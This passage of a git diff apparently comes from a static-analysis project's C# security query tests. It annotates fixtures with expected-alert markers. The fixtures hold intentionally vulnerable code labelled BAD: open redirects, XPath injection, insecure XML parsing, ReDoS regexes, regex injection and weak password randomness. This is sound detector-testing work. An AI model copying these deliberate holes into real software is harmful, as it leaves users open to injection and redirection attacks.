Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.qlref index 5ec9c0d849c1..6006de2bd61b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-321/HardcodedEncryptionKey.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.cs b/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.cs index 58241499c66b..93edb1e318ec 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.cs @@ -9,9 +9,9 @@ public class InsecureRandomness public void RandomTest() { // BAD: Using insecure RNG to generate password - string password = InsecureRandomString(10); - password = InsecureRandomStringFromSelection(10); - password = InsecureRandomStringFromIndexer(10); + string password = InsecureRandomString(10); // $ Alert[cs/insecure-randomness]=r1 + password = InsecureRandomStringFromSelection(10); // $ Alert[cs/insecure-randomness]=r2 + password = InsecureRandomStringFromIndexer(10); // $ Alert[cs/insecure-randomness]=r3 // IGNORE - do not track further than the first assignment to a tainted variable string passwd = password; // GOOD: Use cryptographically secure RNG @@ -25,7 +25,7 @@ public static string InsecureRandomString(int length) byte[] data = new byte[1]; while (result.Length < length) { - data[0] = (byte)r.Next(97, 122); + data[0] = (byte)r.Next(97, 122); // $ Source[cs/insecure-randomness]=r1 result.Append(new ASCIIEncoding().GetString(data)); } return result.ToString(); @@ -57,7 +57,7 @@ public static string InsecureRandomStringFromSelection(int length) Random r = new Random(); while (result.Length < length) { - result += letters[r.Next(3)]; + result += letters[r.Next(3)]; // $ Source[cs/insecure-randomness]=r2 } return result.ToString(); } @@ -69,7 +69,7 @@ public static string InsecureRandomStringFromIndexer(int length) Random r = new Random(); while (result.Length < length) { - result += letters[r.Next(3)]; + result += letters[r.Next(3)]; // $ Source[cs/insecure-randomness]=r3 } return result; } @@ -77,7 +77,7 @@ public static string InsecureRandomStringFromIndexer(int length) public static string BiasPasswordGeneration() { // BAD: Membership.GeneratePassword generates a password with a bias - string password = System.Web.Security.Membership.GeneratePassword(12, 3); + string password = System.Web.Security.Membership.GeneratePassword(12, 3); // $ Alert[cs/insecure-randomness]=r4 $ Alert[cs/insecure-randomness]=r4 return password; } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.qlref b/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.qlref index b2198beb2b45..a79d744ce61c 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.qlref @@ -1,2 +1,4 @@ query: Security Features/InsecureRandomness.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.cs b/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.cs index e9e5202b40ab..2b9f3974234c 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.cs @@ -4,7 +4,7 @@ public class HomeController : Controller { // BAD: Anti forgery token has been forgotten [HttpPost] - public ActionResult Login() + public ActionResult Login() // $ Alert[cs/web/missing-token-validation] { return View(); } @@ -55,7 +55,7 @@ public class DerivedUnprotectedController : UnprotectedBaseController { // BAD: No antiforgery validation on this or any base class [HttpPost] - public ActionResult NoInheritedValidation() + public ActionResult NoInheritedValidation() // $ Alert[cs/web/missing-token-validation] { return View(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.qlref index 5e1ab2426c65..8948b9773a2d 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.qlref @@ -1 +1,2 @@ query: Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref index 5a653b7ada09..d0d38c4b0117 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref @@ -1 +1,2 @@ query: Security Features/CWE-451/MissingXFrameOptions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/Web.config index 8f0b996a0244..66a19f0635a5 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/Web.config @@ -2,4 +2,4 @@ - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref b/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref index 95e9bc80fe7f..c792e1fcbe42 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref @@ -1 +1,2 @@ query: Security Features/CWE-548/ASPNetDirectoryListing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-548/web.config b/csharp/ql/test/query-tests/Security Features/CWE-548/web.config index b4276433838e..0631d8116609 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-548/web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-548/web.config @@ -1,6 +1,6 @@ - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.cs b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.cs index 3b3aae534adb..673502b960e1 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.cs @@ -10,7 +10,7 @@ public class UrlRedirectHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: a request parameter is incorporated without validation into a URL redirect - ctx.Response.Redirect(ctx.Request.QueryString["page"]); + ctx.Response.Redirect(ctx.Request.QueryString["page"]); // $ Alert[cs/web/unvalidated-url-redirection]=r2 $ Alert[cs/web/unvalidated-url-redirection]=r2 // GOOD: the request parameter is validated against a known fixed string if (VALID_REDIRECT == ctx.Request.QueryString["page"]) @@ -20,7 +20,7 @@ public void ProcessRequest(HttpContext ctx) // GOOD: We check whether this is a local URL before redirecting, using UrlHelper. // As recommended by https://docs.microsoft.com/en-us/aspnet/mvc/overview/security/preventing-open-redirection-attacks - string url = ctx.Request.QueryString["page"]; + string url = ctx.Request.QueryString["page"]; // $ Source[cs/web/unvalidated-url-redirection]=r5 $ Source[cs/web/unvalidated-url-redirection]=r6 $ Source[cs/web/unvalidated-url-redirection]=r7 $ Source[cs/web/unvalidated-url-redirection]=r8 if (new UrlHelper(null).IsLocalUrl(url)) { ctx.Response.Redirect(url); @@ -35,8 +35,8 @@ public void ProcessRequest(HttpContext ctx) } // BAD: Adding or appending a header - ctx.Response.AddHeader("Location", ctx.Request.QueryString["page"]); - ctx.Response.AppendHeader("Location", ctx.Request.QueryString["page"]); + ctx.Response.AddHeader("Location", ctx.Request.QueryString["page"]); // $ Alert[cs/web/unvalidated-url-redirection]=r3 $ Alert[cs/web/unvalidated-url-redirection]=r3 + ctx.Response.AppendHeader("Location", ctx.Request.QueryString["page"]); // $ Alert[cs/web/unvalidated-url-redirection]=r4 $ Alert[cs/web/unvalidated-url-redirection]=r4 // GOOD: Redirecting to the RawUrl only reloads the current Url ctx.Response.Redirect(ctx.Request.RawUrl); @@ -45,7 +45,7 @@ public void ProcessRequest(HttpContext ctx) ctx.Response.Redirect("foo.asp?param=" + url); // BAD: Using Transfer with unvalidated user input - ctx.Server.Transfer(url); + ctx.Server.Transfer(url); // $ Alert[cs/web/unvalidated-url-redirection]=r5 // GOOD: request parameter is URL encoded ctx.Response.Redirect(HttpUtility.UrlEncode(ctx.Request.QueryString["page"])); @@ -61,19 +61,19 @@ public void ProcessRequest(HttpContext ctx) ctx.Response.Redirect($"foo.asp?param={url}"); // BAD: The attacker can control the location - ctx.Response.Redirect($"{url}.asp?param=foo"); + ctx.Response.Redirect($"{url}.asp?param=foo"); // $ Alert[cs/web/unvalidated-url-redirection]=r6 // GOOD: The attacker can only control the parameters, not the location ctx.Response.Redirect(string.Format("foo.asp?param={0}", url)); // BAD: The attacker can control the location - ctx.Response.Redirect(string.Format("{0}.asp?param=foo", url)); + ctx.Response.Redirect(string.Format("{0}.asp?param=foo", url)); // $ Alert[cs/web/unvalidated-url-redirection]=r7 // GOOD: The attacker can only control the parameters, not the location ctx.Response.Redirect(string.Format("foo.asp?{1}param={0}", url, url)); // BAD: The attacker can control the location - ctx.Response.Redirect(string.Format("{1}.asp?{0}param=foo", url, url)); + ctx.Response.Redirect(string.Format("{1}.asp?{0}param=foo", url, url)); // $ Alert[cs/web/unvalidated-url-redirection]=r8 } // Implementation as recommended by Microsoft. diff --git a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.qlref b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.qlref index fdb38b9ffc00..c24957fa4a02 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-601/UrlRedirect.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect2.cs b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect2.cs index 83f499ea048d..6093fbeeb4a7 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect2.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect2.cs @@ -11,7 +11,7 @@ public class UrlRedirectHandler2 : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: a request parameter is incorporated without validation into a URL redirect - ctx.Response.Redirect(ctx.Request.QueryString["page"]); + ctx.Response.Redirect(ctx.Request.QueryString["page"]); // $ Alert[cs/web/unvalidated-url-redirection]=r1 $ Alert[cs/web/unvalidated-url-redirection]=r1 var redirectUrl = ctx.Request.QueryString["page"]; if (VALID_REDIRECTS.Contains(redirectUrl)) diff --git a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirectCore.cs b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirectCore.cs index 2da9652d8547..b147be0fe32a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirectCore.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirectCore.cs @@ -10,50 +10,50 @@ public class SomeController : ControllerBase private static string SomeValue = "HeaderValue"; [HttpPost] - public void Post([FromBody] string value) + public void Post([FromBody] string value) // $ Source[cs/web/unvalidated-url-redirection]=r9 $ Source[cs/web/unvalidated-url-redirection]=r10 $ Source[cs/web/unvalidated-url-redirection]=r11 $ Source[cs/web/unvalidated-url-redirection]=r12 $ Source[cs/web/unvalidated-url-redirection]=r13 $ Source[cs/web/unvalidated-url-redirection]=r14 $ Source[cs/web/unvalidated-url-redirection]=r15 { // BAD: straight up controller redirect - Redirect(value); + Redirect(value); // $ Alert[cs/web/unvalidated-url-redirection]=r9 // BAD: Setting response headers collection, location = redirect - Response.Headers["location"] = value; + Response.Headers["location"] = value; // $ Alert[cs/web/unvalidated-url-redirection]=r10 // GOOD: Setting response header to a constant value Response.Headers["location"] = SomeValue; // BAD: Setting response headers collection, location = redirect via add method - Response.Headers.Add("location", value); + Response.Headers.Add("location", value); // $ Alert[cs/web/unvalidated-url-redirection]=r11 // GOOD: Setting response header to a constant value Response.Headers.Add("location", "foo"); // BAD: redirect via location - Response.Headers.SetCommaSeparatedValues("location", value); + Response.Headers.SetCommaSeparatedValues("location", value); // $ Alert[cs/web/unvalidated-url-redirection]=r12 // BAD = redirect via setting location value from tainted source - Response.Headers.Append("location", value); + Response.Headers.Append("location", value); // $ Alert[cs/web/unvalidated-url-redirection]=r13 // BAD: redirect via setting location header from comma-separated values - Response.Headers.AppendCommaSeparatedValues("location", value); + Response.Headers.AppendCommaSeparatedValues("location", value); // $ Alert[cs/web/unvalidated-url-redirection]=r14 // BAD: tainted redirect to Action - RedirectToActionPermanent("Error" + value); + RedirectToActionPermanent("Error" + value); // $ Alert[cs/web/unvalidated-url-redirection]=r15 } // PUT: api/Some/5 [HttpPut("{id}")] - public void Put(int id, [FromBody] string value) + public void Put(int id, [FromBody] string value) // $ Source[cs/web/unvalidated-url-redirection]=r16 $ Source[cs/web/unvalidated-url-redirection]=r17 $ Source[cs/web/unvalidated-url-redirection]=r18 { - RedirectToPage(value); + RedirectToPage(value); // $ Alert[cs/web/unvalidated-url-redirection]=r16 var headers = new ResponseHeaders(Response.Headers); // BAD: redirect via header helper class - headers.Location = new Uri(value); + headers.Location = new Uri(value); // $ Alert[cs/web/unvalidated-url-redirection]=r17 // BAD: response redirect - Response.Redirect(value); + Response.Redirect(value); // $ Alert[cs/web/unvalidated-url-redirection]=r18 // GOOD: whitelisted redirect if(Url.IsLocalUrl(value)) diff --git a/csharp/ql/test/query-tests/Security Features/CWE-611/Test.cs b/csharp/ql/test/query-tests/Security Features/CWE-611/Test.cs index 005e79a7fb4f..103d3cca4cc0 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-611/Test.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-611/Test.cs @@ -8,7 +8,7 @@ public class XMLHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: XmlTextReader is insecure with these options, using user-provided data - XmlTextReader reader = new XmlTextReader(ctx.Request.QueryString["document"]) { DtdProcessing = DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }; + XmlTextReader reader = new XmlTextReader(ctx.Request.QueryString["document"]) { DtdProcessing = DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }; // $ Alert[cs/xml/insecure-dtd-handling]=r1 $ Alert[cs/xml/insecure-dtd-handling]=r1 $ Alert[cs/insecure-xml-read] } public void insecureXMLBad(string content) @@ -18,10 +18,10 @@ public void insecureXMLBad(string content) settings.XmlResolver = new XmlUrlResolver(); // BAD: insecure settings - XmlReader reader1 = XmlReader.Create(content, settings); + XmlReader reader1 = XmlReader.Create(content, settings); // $ Alert[cs/insecure-xml-read] // BAD: XmlTextReader is insecure with these options - XmlTextReader reader2 = new XmlTextReader(content) { DtdProcessing = DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }; + XmlTextReader reader2 = new XmlTextReader(content) { DtdProcessing = DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }; // $ Alert[cs/insecure-xml-read] } public void insecureXMLGood(string content) diff --git a/csharp/ql/test/query-tests/Security Features/CWE-611/UntrustedDataInsecureXml.qlref b/csharp/ql/test/query-tests/Security Features/CWE-611/UntrustedDataInsecureXml.qlref index 7f685106e250..8cc567d8a970 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-611/UntrustedDataInsecureXml.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-611/UntrustedDataInsecureXml.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-611/UntrustedDataInsecureXml.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-611/UseXmlSecureResolver.qlref b/csharp/ql/test/query-tests/Security Features/CWE-611/UseXmlSecureResolver.qlref index b11f53079246..851c79c15932 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-611/UseXmlSecureResolver.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-611/UseXmlSecureResolver.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-611/UseXmlSecureResolver.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref index 58ec5162739a..1a762e07498e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref @@ -1 +1,2 @@ query: Security Features/CWE-614/RequireSSL.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/Web.config index 1ddaaf2b65f2..7755ae7462d4 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/Web.config @@ -2,7 +2,7 @@ - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref index 58ec5162739a..1a762e07498e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref @@ -1 +1,2 @@ query: Security Features/CWE-614/RequireSSL.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/Web.config index 0ab64b1fcb62..45f9f219f096 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/Web.config @@ -2,8 +2,8 @@ - + - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.cs index a42a629cc7ec..4ce6e1268a72 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.cs @@ -8,16 +8,16 @@ public class XPathInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string userName = ctx.Request.QueryString["userName"]; - string password = ctx.Request.QueryString["password"]; + string userName = ctx.Request.QueryString["userName"]; // $ Source[cs/xml/xpath-injection]=r1 $ Source[cs/xml/xpath-injection]=r3 $ Source[cs/xml/xpath-injection]=r5 $ Source[cs/xml/xpath-injection]=r7 $ Source[cs/xml/xpath-injection]=r9 $ Source[cs/xml/xpath-injection]=r11 $ Source[cs/xml/xpath-injection]=r13 + string password = ctx.Request.QueryString["password"]; // $ Source[cs/xml/xpath-injection]=r2 $ Source[cs/xml/xpath-injection]=r4 $ Source[cs/xml/xpath-injection]=r6 $ Source[cs/xml/xpath-injection]=r8 $ Source[cs/xml/xpath-injection]=r10 $ Source[cs/xml/xpath-injection]=r12 $ Source[cs/xml/xpath-injection]=r14 var s = "//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"; // BAD: User input used directly in an XPath expression - XPathExpression.Compile(s); + XPathExpression.Compile(s); // $ Alert[cs/xml/xpath-injection]=r1 $ Alert[cs/xml/xpath-injection]=r2 XmlNode xmlNode = null; // BAD: User input used directly in an XPath expression to SelectNodes - xmlNode.SelectNodes(s); + xmlNode.SelectNodes(s); // $ Alert[cs/xml/xpath-injection]=r3 $ Alert[cs/xml/xpath-injection]=r4 // GOOD: Uses parameters to avoid including user input directly in XPath expression var expr = XPathExpression.Compile("//users/user[login/text()=$username]/home_dir/text()"); @@ -26,31 +26,31 @@ public void ProcessRequest(HttpContext ctx) var nav = doc.CreateNavigator(); // BAD - nav.Select(s); + nav.Select(s); // $ Alert[cs/xml/xpath-injection]=r5 $ Alert[cs/xml/xpath-injection]=r6 // GOOD nav.Select(expr); // BAD - nav.SelectSingleNode(s); + nav.SelectSingleNode(s); // $ Alert[cs/xml/xpath-injection]=r7 $ Alert[cs/xml/xpath-injection]=r8 // GOOD nav.SelectSingleNode(expr); // BAD - nav.Compile(s); + nav.Compile(s); // $ Alert[cs/xml/xpath-injection]=r9 $ Alert[cs/xml/xpath-injection]=r10 // GOOD nav.Compile("//users/user[login/text()=$username]/home_dir/text()"); // BAD - nav.Evaluate(s); + nav.Evaluate(s); // $ Alert[cs/xml/xpath-injection]=r11 $ Alert[cs/xml/xpath-injection]=r12 // Good nav.Evaluate(expr); // BAD - nav.Matches(s); + nav.Matches(s); // $ Alert[cs/xml/xpath-injection]=r13 $ Alert[cs/xml/xpath-injection]=r14 // GOOD nav.Matches(expr); @@ -71,17 +71,17 @@ public void ProcessStoredRequest() { connection.Open(); SqlCommand customerCommand = new SqlCommand("SELECT * FROM customers", connection); - SqlDataReader customerReader = customerCommand.ExecuteReader(); + SqlDataReader customerReader = customerCommand.ExecuteReader(); // $ Source[cs/xml/xpath-injection]=r15 $ Source[cs/xml/xpath-injection]=r16 while (customerReader.Read()) { string userName = customerReader.GetString(1); string password = customerReader.GetString(2); // BAD: User input used directly in an XPath expression - XPathExpression.Compile("//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"); + XPathExpression.Compile("//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"); // $ Alert[cs/xml/xpath-injection]=r15 XmlNode xmlNode = null; // BAD: User input used directly in an XPath expression to SelectNodes - xmlNode.SelectNodes("//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"); + xmlNode.SelectNodes("//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"); // $ Alert[cs/xml/xpath-injection]=r16 // GOOD: Uses parameters to avoid including user input directly in XPath expression XPathExpression.Compile("//users/user[login/text()=$username]/home_dir/text()"); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.qlref index a0cdca4727ae..9ffeeb3a2929 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-643/XPathInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ExponentialRegex.cs b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ExponentialRegex.cs index b54b3bbdf81f..30d706fb7f17 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ExponentialRegex.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ExponentialRegex.cs @@ -8,20 +8,20 @@ public class RegexHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { - string userInput = ctx.Request.QueryString["userInput"]; + string userInput = ctx.Request.QueryString["userInput"]; // $ Source[cs/redos]=r1 $ Source[cs/redos]=r2 $ Source[cs/redos]=r3 $ Source[cs/redos]=r4 $ Source[cs/redos]=r5 // BAD: // Artificial regexes - new Regex("^([a-z]+)+$").Match(userInput); - new Regex("^([a-z]*)*$").Replace(userInput, ""); + new Regex("^([a-z]+)+$").Match(userInput); // $ Alert[cs/redos]=r1 + new Regex("^([a-z]*)*$").Replace(userInput, ""); // $ Alert[cs/redos]=r2 // Known exponential blowup regex for e-mail address validation // Problematic part is: ([a-zA-Z0-9]+))* - new Regex("^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$").Match(userInput); + new Regex("^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$").Match(userInput); // $ Alert[cs/redos]=r3 // Known exponential blowup regex for Java class name validation // Problematic part is: (([a-z])+.)+ - new Regex(JAVA_CLASS_REGEX).Match(userInput); + new Regex(JAVA_CLASS_REGEX).Match(userInput); // $ Alert[cs/redos]=r4 // Static use - Regex.Match(userInput, JAVA_CLASS_REGEX); + Regex.Match(userInput, JAVA_CLASS_REGEX); // $ Alert[cs/redos]=r5 // GOOD: new Regex("^(([a-b]+[c-z]+)+$").Match(userInput); new Regex("^([a-z]+)+$", RegexOptions.IgnoreCase, TimeSpan.FromSeconds(1)).Match(userInput); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ReDoS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ReDoS.qlref index de8c70102e05..e3f22da0ebeb 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ReDoS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ReDoS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-730/ReDoS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoSGlobalTimeout/ReDoS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoSGlobalTimeout/ReDoS.qlref index de8c70102e05..e3f22da0ebeb 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoSGlobalTimeout/ReDoS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoSGlobalTimeout/ReDoS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-730/ReDoS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.cs index d5f802a02687..877a029de660 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.cs @@ -7,11 +7,11 @@ public class RegexInjectionHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { - string regex = ctx.Request.QueryString["regex"]; + string regex = ctx.Request.QueryString["regex"]; // $ Source[cs/regex-injection]=r1 string userInput = ctx.Request.QueryString["userInput"]; // BAD: User input used as regex - new Regex(regex).Match(userInput); + new Regex(regex).Match(userInput); // $ Alert[cs/regex-injection]=r1 // GOOD: User input escaped before being used as regex new Regex(Regex.Escape(regex)).Match(userInput); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.qlref index bec7fbac79a5..82cad8aeb6bd 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-730/RegexInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.cs 